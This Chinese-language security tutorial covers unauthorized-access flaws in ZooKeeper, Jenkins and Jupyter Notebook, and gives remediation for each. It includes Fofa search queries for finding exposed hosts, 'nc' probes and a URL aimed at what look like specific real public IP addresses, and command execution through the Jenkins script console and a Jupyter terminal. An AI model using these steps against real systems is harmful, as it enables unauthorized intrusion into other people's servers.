Zookeeper未授权访问漏洞
Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是 2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:ki命令)。攻击者能够执行所有只允许由管理员运行的命令。
漏洞利用:
步骤一:使用以下Fofa语法搜索资产信息.
port="2181"
步骤二:在Kali中使用以下命令进行未授权访问漏洞测试.
echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181
步骤三:可使用Zookeeper可视化管理工具进行连接…
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
漏洞修复
1.修改 ZooKeeper 默认端口,采用其他端口服务。
2.添加访问控制,配置服务来源地址限制策略。
3.增加 ZooKeeper 的认证配置。
-------------------------------------
Jenkins未授权访问漏洞
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
漏洞复现
步骤一:使用以下fofa语法进行产品搜索.
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
步骤二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令...
#执行命令
println "whoami" .execute().text
漏洞修复
1.升级版本。
2.添加认证,设置强密码复杂度及账号锁定。
3.禁止把Jenkins直接暴露在公网。
-------------------------------------
Jupyter NoteBook未授权访问漏洞
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888。
漏洞复现
步骤一:通过以下fofa语法进行产品搜索...或使用vulhub启动靶场..
#fofa语法
"Jupyter Notebook" && port="8888"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d
步骤二:如果存在未授权访问漏洞则直接访问http://IP:8888会直接跳到web管理界面,不需要
输入密码。
http://20.68.248.190:8888/tree?
哪一个打开不需要密码就是未授权 (可尝试弱密码)
步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令..
漏洞修复
1.开启身份验证,防止未经授权用户访问。
2.访问控制策略,限制IP访问,绑定固定IP